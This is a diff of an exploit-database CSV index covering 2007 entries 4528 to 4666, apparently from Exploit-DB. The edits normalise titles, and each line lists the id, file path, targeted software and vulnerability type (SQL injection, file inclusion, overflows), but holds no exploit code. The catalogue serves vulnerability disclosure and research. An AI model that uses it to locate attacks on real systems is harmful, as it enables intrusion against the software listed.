+4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 +4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x - (m3u) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 -4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0 -4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 - (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 -4534,platforms/linux/remote/4534.c,"eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,143 -4535,platforms/linux/dos/4535.pl,"eXtremail <= 2.1.1 - Remote Heap Overflow PoC",2007-10-15,mu-b,linux,dos,0 -4536,platforms/php/webapps/4536.txt,"doop CMS <= 1.3.7 - (page) Local File Inclusion",2007-10-15,vladii,php,webapps,0 +4532,platforms/linux/dos/4532.pl,"eXtremail 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0 +4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 +4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 PLAIN authentication Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,143 +4535,platforms/linux/dos/4535.pl,"eXtremail 2.1.1 - Remote Heap Overflow PoC",2007-10-15,mu-b,linux,dos,0 +4536,platforms/php/webapps/4536.txt,"doop CMS 1.3.7 - (page) Local File Inclusion",2007-10-15,vladii,php,webapps,0 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow Exploit",2005-05-03,greuff,linux,remote,0 -4538,platforms/php/webapps/4538.txt,"Artmedic CMS <= 3.4 - (index.php page) Local File Inclusion",2007-10-16,iNs,php,webapps,0 -4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - Remote SQL Injection",2007-10-16,dumenci,php,webapps,0 -4540,platforms/multiple/dos/4540.pl,"GCALDaemon <= 1.0-beta13 - Remote Denial of Service Exploit",2007-10-16,ikki,multiple,dos,0 +4538,platforms/php/webapps/4538.txt,"Artmedic CMS 3.4 - (index.php page) Local File Inclusion",2007-10-16,iNs,php,webapps,0 +4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps,0 +4540,platforms/multiple/dos/4540.pl,"GCALDaemon 1.0-beta13 - Remote Denial of Service Exploit",2007-10-16,ikki,multiple,dos,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow Exploit",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 HTTP Basic Authentication Bypass Exploit",2007-10-16,ikki,linux,remote,0 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - (djpage.php page) Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 -4544,platforms/php/webapps/4544.txt,"LimeSurvey <= 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 -4545,platforms/php/webapps/4545.txt,"awzMB <= 4.2 beta 1 - Multiple Remote File Inclusion Vulnerabilities",2007-10-18,S.W.A.T.,php,webapps,0 -4546,platforms/php/webapps/4546.txt,"ZZ FlashChat <= 3.1 - (help.php) Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 +4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 +4545,platforms/php/webapps/4545.txt,"awzMB 4.2 beta 1 - Multiple Remote File Inclusion Vulnerabilities",2007-10-18,S.W.A.T.,php,webapps,0 +4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - (help.php) Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 - Remote Blind SQL Injection Exploit",2007-10-20,"Michael Brooks",php,webapps,0 -4548,platforms/php/webapps/4548.php,"Vanilla <= 1.1.3 - Remote Blind SQL Injection Exploit",2007-10-20,InATeam,php,webapps,0 -4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 -4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0 -4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 +4548,platforms/php/webapps/4548.php,"Vanilla 1.1.3 - Remote Blind SQL Injection Exploit",2007-10-20,InATeam,php,webapps,0 +4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 +4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0 +4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusion Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0 4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 -4556,platforms/multiple/remote/4556.txt,"LiteSpeed Web Server <= 3.2.3 - Remote Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 +4556,platforms/multiple/remote/4556.txt,"LiteSpeed Web Server 3.2.3 - Remote Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sphpblog) <= 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) 1.0 - Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps,0 -4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox <= 2.0.0.7 - Remote Denial of Service Exploit",2007-10-22,BugReport.IR,multiple,dos,0 +4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service Exploit",2007-10-22,BugReport.IR,multiple,dos,0 4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4562,platforms/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 @@ -4212,39 +4212,39 @@ id,file,description,date,author,platform,type,port 4564,platforms/multiple/local/4564.txt,"Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit",2007-10-23,sh2kerr,multiple,local,0 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusion Vulnerabilities",2007-10-23,Civi,php,webapps,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (Metasploit)",2007-10-24,ri0t,windows,remote,10616 -4567,platforms/multiple/remote/4567.pl,"Jakarta Slide <= 2.1 RC1 - Remote File Disclosure Exploit",2007-10-24,kingcope,multiple,remote,0 -4568,platforms/php/webapps/4568.txt,"TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities",2007-10-25,L4teral,php,webapps,0 -4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM <= r11.5 - Remote Stack Based Overflow / DoS",2007-10-27,"Nice Name Crew",windows,dos,0 -4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0 -4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0 -4572,platforms/multiple/local/4572.txt,"Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 +4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure Exploit",2007-10-24,kingcope,multiple,remote,0 +4568,platforms/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion Vulnerabilities",2007-10-25,L4teral,php,webapps,0 +4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / DoS",2007-10-27,"Nice Name Crew",windows,dos,0 +4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection Exploit (1)",2007-10-27,bunker,multiple,local,0 +4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0 +4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 -4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0 -4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection",2007-10-28,ZynbER,php,webapps,0 +4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - (include_path) Multiple Remote File Inclusion Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0 +4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion",2007-10-28,mozi,php,webapps,0 -4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) Remote SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 +4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit",2007-10-29,rgod,windows,remote,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 -4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Include",2007-10-28,"Alkomandoz Hacker",php,webapps,0 +4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - (.m3u) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 -4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - RFI",2007-10-29,r00t@zapak.com,php,webapps,0 +4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0 -4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) Remote SQL Injection",2007-10-30,irk4z,php,webapps,0 +4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) SQL Injection",2007-10-30,irk4z,php,webapps,0 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 -4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress <= 0.4.2b - RFI",2007-11-01,S.W.A.T.,php,webapps,0 +4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 -4595,platforms/php/webapps/4595.txt,"Synergiser <= 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 -4596,platforms/php/webapps/4596.txt,"Scribe <= 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 -4597,platforms/php/webapps/4597.txt,"DM Guestbook <= 0.4.1 - Multiple Local File Inclusion Vulnerabilities",2007-11-02,GoLd_M,php,webapps,0 +4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 +4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 +4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion Vulnerabilities",2007-11-02,GoLd_M,php,webapps,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 -4600,platforms/linux/dos/4600.py,"Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit",2007-11-02,nnp,linux,dos,0 +4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service Exploit",2007-11-02,nnp,linux,dos,0 4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service Exploit",2007-11-02,RoMaNSoFt,multiple,dos,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - (includes.inc selskin) Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 @@ -4252,77 +4252,77 @@ id,file,description,date,author,platform,type,port 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion Vulnerabilities",2007-11-04,ShAy6oOoN,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 4607,platforms/php/webapps/4607.txt,"syndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 -4608,platforms/php/webapps/4608.php,"JBC Explorer <= 7.20 RC 1 - Remote Code Execution Exploit",2007-11-05,DarkFig,php,webapps,0 -4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c Remote SQL Injection",2007-11-05,Q7x,asp,webapps,0 +4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution Exploit",2007-11-05,DarkFig,php,webapps,0 +4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c SQL Injection",2007-11-05,Q7x,asp,webapps,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow PoC",2007-11-06,shinnai,windows,dos,0 -4611,platforms/php/webapps/4611.txt,"jPORTAL 2 mailer.php Remote SQL Injection",2007-11-06,Kacper,php,webapps,0 -4612,platforms/aix/local/4612.py,"IBM AIX <= 5.3.0 - setlocale() Local Privilege Escalation Exploit",2007-11-07,"Thomas Pollet",aix,local,0 +4611,platforms/php/webapps/4611.txt,"jPORTAL 2 mailer.php SQL Injection",2007-11-06,Kacper,php,webapps,0 +4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Local Privilege Escalation Exploit",2007-11-07,"Thomas Pollet",aix,local,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0 -4614,platforms/php/webapps/4614.txt,"jPORTAL <= 2.3.1 articles.php Remote SQL Injection",2007-11-09,Alexsize,php,webapps,0 -4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 +4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 articles.php SQL Injection",2007-11-09,Alexsize,php,webapps,0 +4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 -4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php Remote SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 -4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - Remote SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 +4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 +4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 -4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script Remote SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 +4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 -4622,platforms/php/webapps/4622.txt,"Myspace Clone Script Remote SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 -4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple Remote SQL Injection Vulnerabilities",2007-11-14,k1tk4t,php,webapps,0 +4622,platforms/php/webapps/4622.txt,"Myspace Clone Script SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 +4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injection Vulnerabilities",2007-11-14,k1tk4t,php,webapps,0 4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow Proof of Concept",2007-11-16,"RISE Security",osx,dos,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 -4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery - RFI",2007-11-16,Crackers_Child,php,webapps,0 -4627,platforms/php/webapps/4627.txt,"ProfileCMS <= 1.0 - (id) Remote SQL Injection",2007-11-16,K-159,php,webapps,0 +4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps,0 +4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - (id) SQL Injection",2007-11-16,K-159,php,webapps,0 4628,platforms/php/webapps/4628.txt,"Myspace Clone Script (index.php) Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0 -4629,platforms/php/webapps/4629.txt,"net-finity (links.php) Remote SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0 +4629,platforms/php/webapps/4629.txt,"net-finity (links.php) SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0 4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 -4631,platforms/php/webapps/4631.txt,"phpBBViet <= 02.03.2007 - (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 +4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 -4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script Remote SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 +4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel Remote Code Injection Exploit",2007-11-18,Liz0ziM,php,webapps,0 4636,platforms/php/webapps/4636.txt,"joomla component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - (LFI/SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 -4639,platforms/php/webapps/4639.htm,"Ucms <= 1.8 Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 +4639,platforms/php/webapps/4639.htm,"Ucms 1.8 Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion Vulnerabilities",2007-11-21,NoGe,php,webapps,0 -4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 - (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 -4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart <= 1.0 - Remote File Include",2007-11-22,S.W.A.T.,php,webapps,0 -4643,platforms/php/webapps/4643.py,"VigileCMS <= 1.8 Stealth Remote Command Execution Exploit",2007-11-22,The:Paradox,php,webapps,0 -4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) Remote SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 -4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) Remote SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 -4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 article.php Remote SQL Injection Exploit",2007-11-22,Shadowleet,php,webapps,0 +4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends 4.98 - (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 +4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 +4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 Stealth Remote Command Execution Exploit",2007-11-22,The:Paradox,php,webapps,0 +4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 +4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 +4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 article.php SQL Injection Exploit",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem (kb_whois.cgi) Command Execution",2007-11-22,"Zero X",cgi,webapps,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC",2007-11-23,h07,multiple,dos,0 -4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - Remote SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 +4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 -4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php Remote SQL Injection",2007-11-24,ka0x,php,webapps,0 -4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 -4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 -4656,platforms/php/webapps/4656.txt,"RunCMS <= 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 +4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php SQL Injection",2007-11-24,ka0x,php,webapps,0 +4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 +4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Remote XSS / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 +4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0 -4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0 +4658,platforms/php/webapps/4658.php,"RunCMS 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0 -4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,"Khashayar Fereidani",php,webapps,0 -4661,platforms/php/webapps/4661.py,"DeluxeBB <= 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 -4662,platforms/php/webapps/4662.txt,"Tilde CMS <= 4.x - (aarstal) Remote SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 +4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection Exploit",2007-11-25,"Khashayar Fereidani",php,webapps,0 +4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 +4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - (aarstal) SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0 4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit",2007-11-27,"YAG KOHHA",windows,remote,0 -4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple Remote SQL Injection Vulnerabilities",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 +4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injection Vulnerabilities",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4666,platforms/php/webapps/4666.txt,"Eurologon CMS files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 